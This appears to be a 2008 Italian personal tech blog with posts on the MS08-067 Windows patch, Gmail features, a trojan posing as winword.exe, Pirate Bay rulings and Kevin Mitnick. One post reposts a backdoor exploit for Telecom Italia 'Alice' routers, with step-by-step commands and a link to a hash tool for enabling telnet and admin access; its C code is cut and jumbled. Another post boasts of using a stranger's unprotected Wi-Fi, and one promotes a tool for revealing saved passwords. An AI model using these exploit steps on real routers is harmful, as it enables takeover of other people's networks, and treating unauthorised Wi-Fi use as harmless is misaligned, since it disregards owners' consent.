Windows LiveWindows Live
 
 
franz's profileHKANCPhotosBlogListsMore Tools Help

Blog
    October 24

    Patch URGENTE Microsoft

    Non è certo cosa di tutti i giorni che Microsoft rilasci un aggiornamento di sicurezza fuori dal consueto ciclo di bollettini mensili. Per portare ad una decisione del genere, il problema deve essere senz'altro significativo.

    E così pare, leggendo il comunicato Vulnerability in Server Service Could Allow Remote Code Execution (MS08-067) reso disponiile dal gruppo durante la tarda giornata di ieri.

    La falla

    Il problema, classificato come Critical per Windows 2000, Windows XP e Windows Server 2003, affligge il servizio Server presente su tutti i sistemi operativi Windows moderni.

    Inviando una richiesta RPC malformata ad un calcolatore non debitamente aggiornato, un cracker potrebbe eseguire codice da remoto e guadagnare il totale controllo del PC via Internet, garantendosi il pieno accesso a tutte le informazioni memorizzate (servizi di e-banking e password per i siti riservati comprese), oppure la possibilità di accendere la webcam e il microfono eventualmente presenti o, ancora, utilizzare il sistema come distributore di spam o testa di ponte per portare attacchi verso terzi.

    Windows Vista e Windows Server 2008 meno esposti

    Anche l'ultima generazione di sistemi operativi Microsoft è vulnerabile, sebbene in modo meno grave. Se qualsiasi utente, anche anonimo, può infatti sfruttare il baco e portare con successo un attacco contro calcolatori dotati di Windows 2000, Windows XP o Windows Server 2003, per aggredire Windows Vista o Windows Server 2008 è necessario che il cracker sia in possesso di credenziali di accesso valide.

    Questo, ricondotto a scenari reali, può significare un contesto di rete multiutente, quali una LAN aziendale/universitaria molto ampia.

    Alla luce di queste differenze, Microsoft ha etichettato l'aggiornamento come Important per quanto riguarda Windows Vista e Windows Server 2008.
    Anche Windows 7 pre-beta è a rischio

    Nel bollettino è presente una nota sicuramente curiosa: Microsoft segnala infatti che anche la pre-beta di Windows 7, versione di Windows destinata a succedere all'attuale Windows Vista, è a rischio, con le stesse limitazioni inerenti lo stesso Windows Vista.

    Anche i (pochissimi) betatester che avessero in adozione il prodotto sono quindi invitati ad aggiornare la propria copia.

    Modalità di aggressione

    Problemi di questo tipo sono fra i più pericolosi nel mondo della sicurezza IT, poiché non richiedono alcun intervento da parte dell'utente.

    Se infatti nella maggior parte dei bug di sicurezza rilevati nelle applicazioni è necessaria un'azione da parte dell'utente (visitare un sito-trappola, aprire un documento appositamente confezionato o un programma allegato ad un messaggio e-mail, tanto per fare alcuni esempi), in questo caso il sistema può essere compromesso semplicemente inviando uno speciale messaggio via rete: il calcolatore potrebbe essere compromesso anche in caso non vi fosse alcun utilizzatore seduto davanti allo stesso.

    Ecco quindi che anche l'aggressione ai server potrebbe essere attuabile.

    Rischio worm

    Il problema è sicuramente serio anche per la possibilità di essere sfruttato in automatico: stando a Microsoft, vi sarebbe infatti la concreta possibilità che un cracker possa confezionare un worm basato su tale vulnerabilità, in grado di auto-replicarsi su tutti i calcolatori collegati ad ogni bersaglio contro cui l'attacco fosse andato a buon fine.

    Ottenere la patch

    La distribuzione dell'aggiornamento via Aggiornamenti automatici è già iniziata: tutti gli utenti che avessero mantenuta attiva l'opzione dovrebbero quindi ricevere la correzione in modo trasparente.

    Per gli amanti dell'aggiornamento manuale, o per chi cercasse l'installer off-line, il punto di partenza è http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

    L'opinione: C'è da preoccuparsi?

    Questa falla ha numerose similitudini con quella che portò alla creazione di Blaster prima e Sasser in seguito.

    Come allora, anche oggi è sufficiente adottare un personal firewall in configurazione standard per essere al sicuro: questa volta però, Windows Firewall, già di per sé sufficiente ad arginare il problema, è incluso e abilitato per impostazione predefinita su tutte le connessioni create da Windows XP SP2 in poi.

    Inoltre, oggi la maggior parte delle connessioni ad Internet avviene mediante un router dotato di firewall, che offre un ulteriore sbarramento al diffondersi di una aggressione su larga scala.

    Concludendo quindi: è importante aggiornare questa patch? si, sicuramente.

    Fonte:megalab
    2:24 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 23

    Gmail ha anche la risposta automatica

    I Gmail Labs continuano a sfornare idee e per il servizio di posta elettronica di Google: dopo il sistema che obbliga a risolvere quesiti matematici prima di spedire un'e-mail, è la volta di una funzione utile per davvero e che molti stavano aspettando: l'autoreply, ossia la risposta automatica.

    La risposta automatica va di pari passo con la risposta preconfezionata (canned response) che contestualmente è stata introdotta: se capita di inviare a ripetizione la stessa mail (o mail simili) a diversi destinatari, avere un testo già pronto da riutilizzare a piacimento e al quale accedere rapidamente può far risparmiare parecchio tempo.

    La risposta automatica si basa su un principio simile: si può impostare un filtro e, ogni volta che le condizioni del filtro saranno soddisfatte, Gmail risponderà in autonomia con la canned response che abbiamo scelto.
    Certo questa pratica espone a qualche rischio: il filtro potrebbe sbagliare e inviare un'autoreply a un'e-mail che invece meritava una risposta manuale, ma un sistema per ovviare almeno parzialmente a questo inconveniente c'è.
    Si può infatti eseguire una sorta di "anteprima" del funzionamento del filtro sfruttando la cartella In Arrivo, per vedere quali messaggi sarebbero interessati dall'autoreply.
    Come per le altre funzioni dei Labs, canned responses e autoreply sono accessibili solo a chi ha impostato la lingua inglese per il proprio account Gmail.

    Fonte:zeusnews
    8:17 AM | Add a comment | Permalink | Blog it | Computer e Internet
    October 22

    Occhio winword

    Qualche gg fa bazzicando un sito che non e' sospetto (hem detto da me e' non corretto)..infatti non lo e'smiley ma ho scaricato un SW che sembrava ok... antivirus aggiornato (AVG) ed antispy attivo (Spyware doctor) tutti aggiornati.

    Il gg dopo come avvio il pc mi accorgo di un paio di cose sospette:

    1) Uno spazio "blank" fra gli applicativi nella task bar...non chiudibile manualmente

    2) Il firewall che mi chiede di far accedere  winword ad internet (quando mai?)

    Blocco la richesta ed ovviamente indago....scansione con atimalewar e antivirus negativa...allora analizzo i processi attivi... come? Con un applicativo che uso da sempre e ritengo fantastico...killprocess (http://www.orangelampsoftware.com/about_app.shtml)

    e trovo effetiivamente un winword.exe attivo..ma dentro wimdows/system32...

    era proprio quello....il figlio di Trojan

    Quindi in campana sempre.
    10:48 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 16

    Un mio articolo in biblioteca

    Bhe facendo una ricerca..ho trovato un mio articolo pubblicato su un sito relativo ad una biblioteca on-line....

    Non ci credevo neanche io...

    http://biblioteca.hopfrog.it/?q=content/proteggi-il-tuo-pc

    11:38 PM | Add a comment | Permalink | Blog it | Computer e Internet

    Vulnerabilita' Alice ADSL

    DA saxdax & drpepperONE

    Volutamente censurato da me x evitare danni

    1) Introduction
    ===============

    Telecom Italia is the most important Italian ISP offering an ADSL
    service named "Alice".
    Telecom Italia rent out with "Alice Adsl" service, different CPE
    Modem/Router among which
    the affected ones.
    The interface to configure these modems are made extremily poor by the
    provider to ensure
    more control.
    There's no way to enable telnet, ftp, tftp or more advanced web pages
    from the web interface.

    http://www.telecomitalia.com/
    http://adsl.alice.it/

    #############################################################################################

    ================
    2) Vulnerability
    ================

    An attacker can activate and get unauthorized access to the routers
    administration
    interface and telnet/ftp/tftp services from internal network.

    Every user in the LAN (or Wireless LAN) can nevertheless have access
    to the routers
    administration interface and telnet/ftp/tftp!

    If an attacker can get access to the administrator interface and
    login, he has full control
    over the routers configuration.

    #############################################################################################


    ==============
    3) The Exploit
    ==============

    To enable telnet/ftp/tftp and web-admin interface it is necessary send a special
    IP packet to router specific ip 192.168.1.1.
    This works only from internal LAN where an attacker have and ip like
    192.168.1.XX.
    The ip packet send to router must have the following feature:

    1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
    2)Payload size 8 byte
    3)The payload are the first 8 byte of a salted md5 of the mac address
    of device br0
    4)br0 in these modems has the same mac of eth0

    When the modem receives the packet all services will be enabled.

    Example:

    >From a GNU/LINUX distrib:

    1)Retrieve br0 maccaddress:

    arping -I eth0 -c 2 192.168.1.1

    ARPING 192.168.1.1 from 192.168.1.2 eth0
    Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
    Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
    Sent 2 probes (1 broadcast(s))
    Received 2 response(s)

    2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte
    long file with the mac address.
          run the application below and copy the output hash.
          http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

    3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file
    (with the tool you like)

          i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

    4)Telnet to router :

          telnet 192.168.1.1

          BCM96348 ADSL Router
          Login: admin
          Password:

    #############################################################################################

    ===========
    4) The Code
    ===========

    /* Alice Backdoor Pwd creator by saxdax */
    /* this code generates an 8 byte hash to use as the paylod of the ip packet   */
    /* the mac must be in an hex file and has to be passed as argument to
    the program */

    2,  9, 0xFCEFA3F8 );
      P( C, D, A, B,  7, 14, 0x676F02D9 );
      P( B, C, D, A, 12, 20, 0x8D2A4C8A );

    #undef F

    #define F(x,y,z) (x ^ y ^ z)

      P( A, B, C, D,  5,  4, 0xFFFA3942 );
      P
     0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    };

    void md5_finish( md5_context *ctx, uint8 digest[16] )
    {
      uint32 last, padn;
      uint32 high, low;
      uint8 msglen[8];


      high = ( ctx->total[0] >> 29 )
           | ( ctx->total[1] <<  3 );
      low  = ( ctx->total[0] <<  3 );

      PUT_UINT32( low,  msglen, 0 );
      PUT_UINT32( high, msglen, 4 );

      //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]);

          last = ctx->total[0] & 0x3F;
      padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );

      md5_update( ctx, md5_padding, padn );
      md5_update( ctx, msglen, 8 );

      PUT_UINT32( ctx->state[0], digest,  0 );
      PUT_UINT32( ctx->state[1], digest,  4 );
      PUT_UINT32( ctx->state[2], digest,  8 );
      PUT_UINT32( ctx->state[3], digest, 12 );
    }

    //#ifdef TEST



    /*
     * those are the standard RFC 1321 test vectors
     */

    static char *msg[] =
    {
      "",
      "a",
      "abc",
      "message digest",
      "abcdefghijklmnopqrstuvwxyz",
      "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
      "12345678901234567890123456789012345678901234567890123456789012" \
          "345678901234567890"
    };

    static char *val[] =
    {
      "

    10:49 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 15

    Note Self-Destruction

    Una nota in email che decidete..quando si autodistrugge...

    https://privnote.com/

    Fatene un uso sensato
    10:48 PM | Add a comment | Permalink | Blog it | Computer e Internet

    Documentario Consigliato

    http://www.megavideo.com/?v=0YONTZCH

    Io nn vi ho detto niente...Animoticon
    10:06 PM | Add a comment | Permalink | Blog it | Computer e Internet

    Contatti reali

    Che dire...ho passato i 16.000 contatti...

    Grazie Party

    9:46 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 14

    Wi-FI non protetto

    Questa sera sono stato invitato a cena dai miei (di solito xche' hanno qualche problema al pc)...mi sono portato il mio fido portatile ed ho fatto un controllino...avevano una connessione Alice non protetta...(quindi i motivi del rallentamento)...ho protetto la connessione e mi sono fatto un giro io..tanto x restituire il favore... OOPSS...mi sono connesso altrove....A bocca aperta


    10:16 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 13

    Hacking Google-Maps-Earth

    Un'altra lettura interessante...


    9:54 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 12

    See password

    “An easily applied retrieval tool for forgotten passwords.”
    BSEditor: When a password appears on screen as a series of asterisks or dots, you simply view it through SeePassword’s magnifying glass to reveal the actual password text. SeePassword has no problems with passwords stored by Internet Explorer?all the sites will yield their secrets.

    X scoprire gli ****


    10:57 PM | Add a comment | Permalink | Blog it | Computer e Internet

    IP Change

    Do you connect to more than one network? Do you feel troublesome whenever you configure your network settings each time you change location? With IP Changer, changing your network configurations will be an extremely easy job. IP Changer 2.0 enables us, on every network, to easily click & select valid TCP/IP settings for Internet access without reboot.

    Si puo' fare..




    10:55 PM | Add a comment | Permalink | Blog it | Computer e Internet
    October 09

    Corso per hackers

    Table of Contents
    “License for Use” Information............................... 2
    Contributors......................................................... 4
    1.0 Introduction.................................................... 5
    1.1 Resources...................................................... 6
    1.1.1 Books........................................................ 6
    1.1.2 Magazines and Newspapers....................... 7
    1.1.3 Zines and Blogs.......................................... 7
    1.1.4 Forums and Mailing Lists............................ 8
    1.1.5 Newsgroups.............................................. 9
    1.1.7 Chat......................................................... 10
    1.1.8 P2P.......................................................... 11
    1.2 Further Lessons........................................... 11

    http://www.hackerhighschool.org/



    9:50 PM | Add a comment | Read comments (1) | Permalink | Blog it | Computer e Internet

    Gmail basta con le email spedite per errore

    A chi non è mai capitato di inviare un'e-mail di fuoco, o imbarazzante, o personale subito prima di andare a letto con la mente magari annebbiata dall'alcool o dalla stanchezza e di pentirsene al mattino dopo?
    Per prevenire l'invio di mail indesiderate (ma indesiderate dal mittente, non dal destinatario) si può fare affidamento sull'ultima creazione dei Gmail Labs: Mail Goggles.

    Attivando questa funzione si può specificare un intervallo di tempo (per esempio, da mezzanotte alle sette del mattino) durante il quale si è obbligati a risolvere alcuni quesiti matematici entro 60 secondi per poter inviare i propri messaggi. Niente soluzione, niente invio.
    Così, sperano i programmatori, si avrà tutto il tempo di ripensarci e, nel caso non si riescano a risolvere i quesiti, un grabato messaggio inviterà ad andare a dormire per riprovare a mente più lucida il mattino successivo.
    Certo, nessun sistema è perfetto: se si impostano i problemi a un livello troppo alto, può diventare difficile anche in condizioni normali risolverli nel tempo limite.
    Se invece si è conservato un minimo di lucidità, con tre click Mail Goggles è disabilitato e si possono commettere tutte le nefandezze virtuali che si desiderano.

    Fonte:zeusnews
    8:30 AM | Add a comment | Permalink | Blog it | Computer e Internet
    October 07

    Pirate Bay dissequestro

    E' passata qualche settimana dal dissequestro del sito di The Pirate Bay, oscurato ad agosto su istanza delle case discografiche; venerdì scorso il Tribunale del Riesame di Bergamo ha depositato le motivazioni. Tali motivazioni sono da oggi disponibili online grazie al Circolo dei giuristi telematici che pazientemente hanno ricopiato la sentenza del Tribunale e l'hanno resa disponibile al grande pubblico di Internet.

    Ecco le prime impressioni "a caldo" dell'avvocato Daniele Minotti, che ha seguito tutta la vicenda: "L'annullamento non è conseguito ad un "cavillo" (problemi di avviso al difensore) che era stato denunciato dai difensori (e che poteva anche essere un validissimo motivo, senza, però, andare al vero nocciolo della vicenda)".

    Prosegue Minotti: "Il riesame di Bergamo ha ritenuto che sussista il "fumus" del reato contestato, cioè una sorta di "indizio" (dico così per evitare il legalese troppo stretto) che, eventualmente, in futuro potrà diventare prova. Gli stessi giudici, però, dicono che quell'inibizione (che, poi, come sappiamo è stato anche un redirect...) non rientra nello schema del sequestro preventivo - misura cautelare reale; insomma, è una misura sui generis che, in quanto non tassativamente prevista, non può essere applicata".

    Matteo Flora, il tecnico informatico che aveva scoperto alcuni importanti particolari relativi al sequestro, ci aiuta a "tradurre" la sentenza dal linguaggio legalese: "Il fatto che vi siano molti materiali coperti da diritto d'autore e il fatto che vi siano molte connessioni determina la verità dell'affermazione "tanti downloadano film pirata". Un po' come dire che tanti pomodori sono al supermercato, tanta gente è nel supermercato, quindi tanta gente compera pomodori. Mi sembra di vedere qualche lacuna nel sillogismo."

    Prosegue Flora: "Non è stato minimamente fatto un sequestro, poichè a tutti gli effetti non realizzava minimamente la "indisponibilità del bene" (i gestori di TPB non notavano infatti differenze). E' stata fatta una inibizione atipica delle connessioni, cosa non prevista dalla legge, non possibile in questi casi e, comunque, illecita nella sua applicazione. E per quanti aspettassero ora che FIMI non faccia altro che reiterare chiedendo l'inibizione, anzichè il sequestro, posso dire che questa non è applicabile da un PM, ma solamente dal Ministero Dell'Interno e compagnia bella in caso di scommesse clandestine e pedopornografia. Secondo me abbiamo assistito a una applicazione nella realtà del Diritto".

    Quindi, conclude Flora, "non è possibile usare l'inibizione via DNS o via IP (il famoso "blocco dei provider") come sequestro. Se si vuole sequestrare il server è necessario andare e recuperarselo".

    Interessanti anche le riflessioni dell'avvocato Guido Scorza, che vale la pena di leggere anche se lui stesso ricorda di non essere un penalista: "I Giudici del riesame hanno, in sostanza stabilito che il provvedimento di questa estate andava annullato perché il diritto processuale penale non contempla provvedimenti cautelari atipici e un ordine di inibitoria è cosa diversa da un ordine di sequestro. A me - povero civilista - sembra cosa ovvia ma... evidentemente in diritto penale non lo è se il GIP del Tribunale di Bergamo ha, a suo tempo, ritenuto di poter ordinare a tutti gli ISP italiani di rendere inaccessibile un intero sito."

    Prosegue Scorza: "A prescindere dai tecnicismi processualpenalistici, sono comunque contento del provvedimento perché chiarisce un principio a me assai caro: non si può rendere inaccessibile un'intera fonte di informazione solo perché attraverso essa vengono diffuse anche informazioni utili a commettere un reato (ammesso che sia così)".

    Fonte:zeusnews
    8:05 AM | Add a comment | Permalink | Blog it | Computer e Internet
    October 02

    Kevin Mitnick trattenuto e interrogato in aeroporto

    Se sbarcando dall'aereo un agente doganale vi dice: "Ci sono alcune persone al piano di sotto che vogliono scambiare due parole con te, ma non preoccuparti, va tutto bene", la prima cosa da fare è proprio preoccuparsi.

    Ciò è specialmente vero se state tornando negli Stati Uniti dopo un viaggio in Colombia, siete pieni di attrezzature informatiche e, soprattutto, vi chiamate Kevin Mitnick.

    L'hacker più famoso del mondo è stato infatti fermato dalla polizia dell'aeroporto di Atlanta poco dopo essere sceso dall'aereo, mentre tornava dal Sud America ed era diretto a una conferenza.

    Non è stato arrestato ma posto in stato di fermo. Gli agenti, alla vista di tre portatili, diversi dischi rigidi esterni, tre iPhone, quattro cellulari e il kit usato nelle conferenze (tra cui un dispositivo per sottrarre i dati alle tessere con chip a radiofrequenza), si sono "illuminati", come ha detto lo stesso Mitnick, credendo di averlo colto con l'attrezzatura per clonare carte di credito.

    Per quattro ore Mitnick è stato trattenuto, interrogato e perquisito, nonostante una recentissima legge degli Stati Uniti consenta questo genere di atti solo in presenza di un ragionevole sospetto di attività illegali.

    Il bello è che, per coincidenza, nello stesso momento a Bogotà un pacco che si era spedito negli Stati Uniti contenente altro materiale informatico veniva aperto e fatto a pezzi (letteralmente: un disco rigido è stato trapanato) perché all'esterno c'erano tracce di cocaina.

    Kevin Mitnick era stato avvisato di quanto avveniva in Sud America dalla fidanzata colombiana poco prima che lo fermassero.

    "Riuscite a immaginare se avessi detto agli agenti: Questo ha qualcosa a che fare con la cocaina?" ha scherzato Mitnick, che però è molto critico con quello che secondo lui è diventato uno "stato di polizia".

    "Viaggio in Paesi stranieri che hanno regole ancora più restrittive, e non ho mai avuto problemi" ha affermato Kevin.

    Per evitare guai con la polizia doganale americana (che potrebbe decidere di sequestrare o perquisire tutto il materiale elettronico che le capita a tiro, nonostante la recente legislazione), quando torna in patria Mitnick crittografa sempre i propri dischi e trasmette le informazioni personali via Internet negli Stati Uniti prima di partire, cancellandole poi dai portatili.

    Ora ha deciso che aggiungerà alle misure di sicurezza anche un clone del MacBook (che porta sempre con sé) da lasciare a casa, così da avere sempre una copia dei propri dati qualora la polizia decida di tenersi il portatile da viaggio. 

    Fonte:zeusnews

    8:08 AM | Add a comment | Permalink | Blog it | Computer e Internet